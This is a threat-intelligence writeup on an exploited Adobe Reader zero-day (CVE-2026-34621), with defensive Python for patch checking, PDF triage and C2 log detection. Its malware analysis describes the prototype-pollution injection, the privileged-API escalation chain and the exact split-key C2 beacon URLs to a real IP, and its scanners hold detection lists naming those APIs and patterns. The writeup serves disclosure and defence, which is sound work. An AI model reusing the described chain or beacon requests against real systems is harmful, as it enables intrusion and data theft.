On 2026-04-11, Adobe assigned CVE-2026-34621 to an in-the-wild zero-day in Acrobat/Reader and classified it as critical arbitrary code execution. The flaw was first flagged publicly on 2026-04-08 by Haifei Li’s EXPMON system, which identified active exploitation of the Adobe Reader JavaScript engine; Adobe later credited Haifei Li for discovery and confirmed that the issue was being exploited in the wild.
Technically, Adobe classifies the vulnerability as CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes, prototype pollution) with CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H and a score of 9.6. The affected builds were Acrobat DC Continuous 26.001.21367 and earlier, Acrobat Reader DC Continuous 26.001.21367 and earlier, and Acrobat 2024 Classic 24.001.30356 and earlier on Windows and macOS. Fixed builds are Acrobat DC/Reader DC 26.001.21411, Acrobat 2024 Classic 24.001.30362 on Windows, and 24.001.30360 on macOS. Adobe set Priority Rating 1, meaning installation within 72 hours.
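Turning the affected and fixed builds above into a fleet check is the first thing a patch owner needs. The following is an added example, not Adobe's tooling and not part of the original writeup: it encodes the build thresholds stated in the advisory text (last affected and first fixed build per branch and platform), compares installed builds numerically rather than as strings, and lists inventory rows that are not confirmed patched. The branch labels ("continuous", "classic2024") and the inventory rows are my own constructions.

```python
# Builds reported above for APSB26-43: last affected build and first fixed build
# per branch and platform. The branch labels are assumptions chosen for this example.
ADVISORY = {
    ("continuous", "windows"):  {"last_vulnerable": "26.001.21367", "fixed": "26.001.21411"},
    ("continuous", "macos"):    {"last_vulnerable": "26.001.21367", "fixed": "26.001.21411"},
    ("classic2024", "windows"): {"last_vulnerable": "24.001.30356", "fixed": "24.001.30362"},
    ("classic2024", "macos"):   {"last_vulnerable": "24.001.30356", "fixed": "24.001.30360"},
}


def parse_build(build: str) -> tuple:
    """'26.001.21367' -> (26, 1, 21367): numeric compare, so '26.001.9999' sorts below it."""
    return tuple(int(part) for part in build.split("."))


def status(branch: str, platform: str, build: str) -> str:
    """Classify one installed build against the advisory thresholds."""
    entry = ADVISORY[(branch, platform)]
    b = parse_build(build)
    if b <= parse_build(entry["last_vulnerable"]):
        return "vulnerable"
    if b >= parse_build(entry["fixed"]):
        return "patched"
    return "unlisted"  # between the two builds; not named by the advisory, verify by hand


def hosts_needing_patch(inventory) -> list:
    """Return (host, status) for every inventory row that is not confirmed patched."""
    pending = []
    for host, branch, platform, build in inventory:
        s = status(branch, platform, build)
        if s != "patched":
            pending.append((host, s))
    return pending


# Constructed inventory rows: (hostname, branch, platform, installed build)
INVENTORY = [
    ("ws-01", "continuous", "windows", "26.001.21367"),
    ("ws-02", "continuous", "windows", "26.001.21411"),
    ("mac-01", "classic2024", "macos", "24.001.30360"),
    ("ws-03", "classic2024", "windows", "24.001.30360"),
    ("ws-04", "classic2024", "windows", "24.001.30290"),
]

if __name__ == "__main__":
    for host, s in hosts_needing_patch(INVENTORY):
        print(host, s)
```

Note that the macOS Classic fix (24.001.30360) is below the Windows Classic fix (24.001.30362), so a Windows host reporting 24.001.30360 is deliberately reported as "unlisted" rather than patched; the advisory text names no fixed Windows build below 30362.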
The primary weaponized sample analyzed by N3mes1s was Invoice540.pdf, a 320,066-byte, PDF 1.7, single-page document created with PyMuPDF and using a 68-byte FlateDecode watermark. Its metadata included the title Blank Page, /Lang en-US, and embedded structures /JavaScript 2, /JS 1, /OpenAction 1, /AcroForm 1, and 11 streams. The sample carried a hidden form field named btn1 with a zero-size rectangle [/Rect [0 0 0 0]] that stored a 98,588-byte base64 blob. N3mes1s reported only two samples in the wild and no detections from network indicators at the time of analysis.
The initial execution chain starts with a 699-byte JSFuck loader embedded in the PDF /JS action and triggered automatically on open. That loader reads a 74 KB Stage 2 payload from a FlateDecode stream. Stage 2 begins with string-table decoding through a function labeled a0_0x23c2(), which rotates an array to recover 141 encoded strings, then fingerprints the environment with app.platform (WIN or MAC), app.language (ENU or RUS), app.viewerVersion, and Collab.isDocReadOnly for ADFS or enterprise detection. Those values are encoded into beacon parameters such as errs=, adfs=, and plts= before any further payload delivery occurs.
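The structural traits described for the sample (script name-tree entries, an open-action trigger, a zero-size form field holding a large blob, privileged API names in the script, FlateDecode streams) are enough for a static pre-filter on incoming PDFs. The following is an added example and not code from N3mes1s or the original analysis: a stdlib-only scanner that counts those keys, inflates streams with zlib and looks for the API names named in the writeup, finds fields with a zero-size /Rect and measures their /V string, and returns a score. The weights, the 1024-byte blob threshold and the test document it builds are my own constructions; the test document only imitates the described layout and contains no exploit logic.

```python
import base64
import re
import zlib

# Structural traits the writeup attributes to Invoice540.pdf: script name-tree
# entries, an open-action trigger, an invisible form field carrying a large blob,
# and privileged Reader APIs named in the decoded script.
NAME_KEYS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AcroForm"]
JS_INDICATORS = [b"__defineGetter__", b"app.trustedFunction", b"app.beginPriv",
                 b"app.endPriv", b"Collab.collectEmailInfo", b"SilentDocCenterLogin"]
ZERO_RECT = re.compile(rb"/Rect\s*\[\s*0\s+0\s+0\s+0\s*\]")
FIELD_NAME = re.compile(rb"/T\s*\(([^)]*)\)")
FIELD_VALUE = re.compile(rb"/V\s*\(([^)]*)\)")
STREAM = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
OBJ = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.DOTALL)


def inflate_streams(pdf: bytes) -> list:
    """Return the body of every stream that inflates as zlib/FlateDecode data."""
    bodies = []
    for m in STREAM.finditer(pdf):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # uncompressed or non-Flate stream; skip it
    return bodies


def hidden_fields(pdf: bytes) -> list:
    """List objects that declare a zero-size /Rect, with the length of their /V string."""
    fields = []
    for m in OBJ.finditer(pdf):
        body = m.group(2)
        if not ZERO_RECT.search(body):
            continue
        name = FIELD_NAME.search(body)
        value = FIELD_VALUE.search(body)
        fields.append({"obj": int(m.group(1)),
                       "name": name.group(1).decode("latin-1") if name else None,
                       "value_len": len(value.group(1)) if value else 0})
    return fields


def triage(pdf: bytes) -> dict:
    """Score a PDF on the traits above; higher means more of the loader pattern is present."""
    keys = {k.decode(): pdf.count(k) for k in NAME_KEYS}
    hits = {i.decode() for i in JS_INDICATORS if i in pdf}       # plaintext script
    for body in inflate_streams(pdf):                             # compressed script
        hits.update(i.decode() for i in JS_INDICATORS if i in body)
    fields = hidden_fields(pdf)
    score = 0
    if keys["/OpenAction"] and keys["/JS"]:
        score += 2  # script executes as soon as the document opens
    if any(f["value_len"] >= 1024 for f in fields):
        score += 3  # large blob parked in an invisible field (assumed threshold)
    if hits:
        score += 3  # privilege-related API names present in script text
    return {"keys": keys, "stream_count": len(STREAM.findall(pdf)),
            "hidden_fields": fields, "api_hits": sorted(hits), "score": score}


def build_sample() -> bytes:
    """Constructed test document, not the real sample: open-action JS, a hidden btn1
    field holding a large base64 string, and one FlateDecode stream of script text."""
    blob = base64.b64encode(b"\x00" * 3000)   # stand-in for an encoded payload
    script = zlib.compress(b"var f = app.trustedFunction(function() {"
                           b" app.beginPriv(); app.endPriv(); });")
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R"
        b" /AcroForm << /Fields [5 0 R] >> >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj\n",
        b"4 0 obj << /S /JavaScript /JS 6 0 R >> endobj\n",
        b"5 0 obj << /FT /Btn /T (btn1) /Rect [0 0 0 0] /V (" + blob + b") >> endobj\n",
        b"6 0 obj << /Length " + str(len(script)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + script + b"\nendstream\nendobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ])


if __name__ == "__main__":
    print(triage(build_sample()))
```

The scanner works on raw bytes on purpose: it needs no PDF library, so it can sit in a mail gateway or a SIEM enrichment step, and it still sees script text inside FlateDecode streams, which a plain string match on the file would miss. Object streams and other filters are not handled, so treat a low score as "nothing found", not as "clean".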
The zero-day itself is the prototype-pollution step. N3mes1s showed that the payload injects Object.prototype.__defineGetter__("ANFancyAlertImpl", function() { ... }), which hijacks the annotation alert dialog across all objects by rewriting shared prototype behavior. The exploit then pivots into privilege escalation by wrapping app.beginPriv() and app.endPriv() inside app.trustedFunction(), enabling calls to ANShareFile() and the undocumented SilentDocCenterLogin() API. N3mes1s reported no VirusTotal references for SilentDocCenterLogin(), making it the most notable undocumented interface in the chain. The final execution step uses Collab.collectEmailInfo() to run the delivered code.
The command-and-control design uses split-key delivery rather than a single monolithic fetch. The first beacon, labeled bird0, performs a GET to http://188.214.34.20:34123/rs1?deer=<fingerprint>&errs=E&adfs=1&plts=WIN and returns a 32-byte AES key. The second beacon, bird1, calls http://188.214.34.20:34123/s11?reindeer=<fingerprint> and receives an AES-CTR encrypted Stage 3 payload of roughly 50 KB, which is then decrypted with the key returned by /rs1, stripped of its PKCS#7 padding, and zlib-decompressed before execution. N3mes1s validated the behavior by running Adobe’s real SpiderMonkey engine (EScript.api) on Linux through the taviso/loadlibrary fork and reported 23/23 test cases passing.
The delivery infrastructure also includes server-side filtering. N3mes1s reported that the C2 returned empty responses to sandboxes, and wdormann independently observed that the PDF “un-blurs” itself in Reader and then contacts 188.214.34.20:34123, but the server returned nothing when tested from a Tor-connected VM. wdormann suspected filtering based on the language=ENU parameter. That same analysis also noted that Mark of the Web does not stop the chain, so browser-zone tagging is not an effective defense here. N3mes1s later assessed the unrecovered Stage 3 as likely a RAT, backdoor, or infostealer, but that final payload was not recovered in the shared analysis.
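The two-beacon exchange and the empty replies described in the previous two paragraphs give a network defender three things to look for: the known host and port, the /rs1 and /s11 path-and-parameter shape (which survives an IP change), and an /rs1 key fetch followed shortly by an /s11 payload fetch from the same client. The following is an added example, not part of the original analysis, that runs those rules over proxy-style log lines. The log layout, the 120-second pairing window, the client addresses and the rotated host 203.0.113.7 are all constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Network indicators reported for the sample
C2_HOST = "188.214.34.20:34123"
C2_PATHS = {"/rs1", "/s11"}
C2_PARAMS = {"deer", "reindeer", "errs", "adfs", "plts"}
SPLIT_KEY_WINDOW = 120  # assumption: seconds allowed between key fetch and payload fetch

# Constructed log layout used here (not any real proxy's format):
#   <epoch> <client-ip> <method> <url> <status> <reply-bytes>
LINE = re.compile(r"^(\d+) (\S+) (GET|POST) (\S+) (\d{3}) (\d+)$")


def parse_line(line: str):
    """Split one log line into fields; None for lines that do not match the layout."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, size = m.groups()
    u = urlsplit(url)
    return {"ts": int(ts), "client": client, "method": method, "host": u.netloc,
            "path": u.path, "params": set(parse_qs(u.query)),
            "status": int(status), "size": int(size)}


def classify(rec: dict) -> list:
    """Per-request reasons: known host, beacon shape, and an empty Stage 3 reply."""
    reasons = []
    if rec["host"] == C2_HOST:
        reasons.append("known C2 host")
    if rec["path"] in C2_PATHS and rec["params"] & C2_PARAMS:
        reasons.append("beacon path and parameter pattern")  # independent of the IP
    if rec["path"] == "/s11" and rec["size"] == 0:
        reasons.append("empty Stage 3 reply (server-side filtering)")
    return reasons


def detect(lines) -> list:
    """Run the per-request rules plus the cross-request split-key sequence rule."""
    alerts = []
    last_key_fetch = {}  # client -> time of its most recent /rs1?deer= request
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if rec["path"] == "/rs1" and "deer" in rec["params"]:
            last_key_fetch[rec["client"]] = rec["ts"]
        elif rec["path"] == "/s11" and "reindeer" in rec["params"]:
            t0 = last_key_fetch.get(rec["client"])
            if t0 is not None and 0 <= rec["ts"] - t0 <= SPLIT_KEY_WINDOW:
                reasons.append("split-key sequence: /rs1 then /s11 from the same client")
        if reasons:
            alerts.append({"client": rec["client"], "host": rec["host"],
                           "path": rec["path"], "reasons": reasons})
    return alerts


# Constructed sample traffic: one full bird0/bird1 exchange from 10.0.0.5, one
# filtered /s11 request to a made-up rotated host (203.0.113.7), and a benign fetch.
SAMPLE_LOG = [
    "1775900000 10.0.0.5 GET http://188.214.34.20:34123/rs1?deer=abc123&errs=E&adfs=1&plts=WIN 200 32",
    "1775900003 10.0.0.5 GET http://188.214.34.20:34123/s11?reindeer=abc123 200 51200",
    "1775900100 10.0.0.9 GET http://203.0.113.7:8080/s11?reindeer=zzz 200 0",
    "1775900200 10.0.0.9 GET http://example.com/index.html 200 5120",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The empty-reply rule matters because of the filtering behavior: a client that was fingerprinted and refused still made the request, so a zero-byte /s11 response is evidence that the document ran, not evidence that nothing happened.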
Targeting indicators come primarily from the decoy content and locale choices. N3mes1s reported Russian-language decoy documents about gas supply disruption and emergency measures in one sample, and a Russian agreement or contract with Moscow addresses in a second sample identified by partial hash 65dca34b. Both documents suggest energy-sector or government targeting, but the provided sources do not support a named actor attribution. The samples were also built with /Lang en-US despite Russian decoy content, which aligns with the language-based filtering observed in the C2 behavior. Community reports further described the sample as a sophisticated fingerprinting exploit aimed at Adobe Reader users rather than a generic mass-delivery payload.
The principal indicators of compromise are:
- SHA-256: 54077a5b15638e354fa02318623775b7a1cc0e8c21e59bcbab333035369e377f
- SHA-1: dafd571da1df72fb53bcd250e8b901103b51d6e4
- MD5: 522cda0c18b410daa033dc66c48eb75a
- Partial related sample hash: 65dca34b
- File name: Invoice540.pdf
- Size: 320,066 bytes
- MIME/format: PDF 1.7, 1 page
- Builder: PyMuPDF
- Hidden payload field: btn1
- C2 IP and port: 188.214.34.20:34123
- C2 endpoints: /rs1, /s11
- C2 keywords: bird0, bird1, deer, reindeer
- Exploited or abused APIs: Object.prototype.__defineGetter__, app.trustedFunction(), app.beginPriv(), app.endPriv(), ANFancyAlertImpl, ANShareFile(), SilentDocCenterLogin(), Collab.collectEmailInfo()
- AV labels reported on the sample: ESET-NOD32 JS/TrojanDropper.Agent.QCE, Avast JS:Pdfka-gen [Expl], AVG JS:Pdfka-gen [Expl], Cynet Malicious (99), Cylance Unsafe, Gridinsoft PDF.Exploit.JS
The community timeline is consistent across independent reporting. On 2026-04-08, Haifei Li first warned that the Adobe Reader zero-day was active in the wild and appeared to involve the JavaScript engine; Gi7w0rm’s repost pointed to the same conclusion. Also on 2026-04-08, N3mes1s published the first forensic summary with the sample hash, detection rate 6/77 (7.8%), decoy-language observations, and the hidden btn1 payload. On 2026-04-09, Haifei Li corrected an earlier calendar slip and said discovery was 4 months before patch release, not 5; Casey relayed that disabling JavaScript in Adobe Reader should block the initial attack; EXPMON described the exploit as a sophisticated fingerprinting attack; and malwrhunterteam noted a related sample on Malware Bazaar and that a recently registered VirusTotal account had voted the sample harmless about 20 hours earlier. That same day, wdormann reported that multiple PDFs exploited the flaw, that Reader removed the blur effect and contacted the C2, and that Tor-connected testing produced empty responses. On 2026-04-10, N3mes1s said the taviso/loadlibrary approach worked against Adobe’s DLL JS engine and that a writeup was coming. On 2026-04-11, N3mes1s relayed the final name CVE-2026-34621, Adobe published APSB26-43, EXPMON’s findings were confirmed, and Adobe described the patch as an emergency update to be installed within 72 hours.
Mitigation is straightforward but time-sensitive. The only supported durable fix is to install the Adobe updates for the affected Acrobat and Reader branches immediately, because Adobe marked the issue Priority 1. Short-term containment is to disable JavaScript in Adobe Reader, which community analysis indicated would stop the initial trigger, but that is a partial control rather than a full remediation. Mark of the Web should not be treated as a defense for this incident, and the observed C2 behavior shows that sandboxing and generic network inspection may miss the payload because the server can withhold it based on client fingerprinting.